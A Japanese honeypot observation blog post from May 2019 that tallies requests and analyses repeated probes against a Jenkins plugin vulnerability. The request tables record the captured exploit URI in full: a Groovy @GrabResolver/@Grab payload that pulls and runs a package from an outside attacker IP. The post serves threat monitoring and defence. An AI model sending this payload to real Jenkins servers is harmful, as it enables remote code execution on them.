Nickセキュリティログ

ハニーポット、バグバウンティ、CTFなどなどセキュリティ関係のことを備忘録がてら書いていきます

2019年5月25日 BW-pot観察まとめ

1.トップ画面

f:id:NickShadows:20190526132706p:plain:w500


2.直近1ヶ月折れ線グラフ

f:id:NickShadows:20190526132958p:plain:w500


3.GETリクエスト

no uri Co
1 / 67
2 /index.action 20
3 /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27nuAObHkS%27,%20root=%27http[:]//185.162.235.211%27)%0a@Grab(group=%27package%27,%20module=%27nuAObHkS%27,%20version=%271%27)%0aimport%20nuAObHkS; 3
4 /manager/html 2
5 /english/ 2
6 /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27NsGdMJsD%27,%20root=%27http[:]//185.162.235.211%27)%0a@Grab(group=%27package%27,%20module=%27NsGdMJsD%27,%20version=%271%27)%0aimport%20NsGdMJsD; 2
7 /admin-scripts.asp 1


4.POSTリクエスト

アクセスなし


5.pypmyadminユーザー

アクセスなし


6.pypmyadminパスワード

アクセスなし


7.wordpressユーザー

アクセスなし


8.wordpressパスワード

アクセスなし


9.tomcatユーザー

no user Co
1 2


10.tomcatパスワード

no pwd Co
1 2


11.直近24時間新着アクセス

no uri request_body
1 /Login/
2 /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27NsGdMJsD%27,%20root=%27http[:]//185.162.235.211%27)%0a@Grab(group=%27package%27,%20module=%27NsGdMJsD%27,%20version=%271%27)%0aimport%20NsGdMJsD;
3 /a2billing/admin/Public/PP_error.php


12.まとめ

「/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile」のアクセスが最近ちょいちょい見かけるから調べてみた。
jenkinのプラグインの脆弱性とのこと。

JVN

jvndb.jvn.jp



NIST

nvd.nist.gov



Poc

github.com

CVSS値もそこそこ高く、Pocも公開されているため、狙われ始めたのだろうか。
パラメータに指定されているIPアドレスは22、80が空いており、テスト用だかなんだかで簡易的に準備された雰囲気があった。


jenkinsciの脆弱性に関して、このハニーポットには5/23からアクセスが始まっており、全て同一のIPアドレスからだった。
IPアドレスはオランダのもので、なぜか22ポートが空いていたので攻撃用サーバなんだと思う。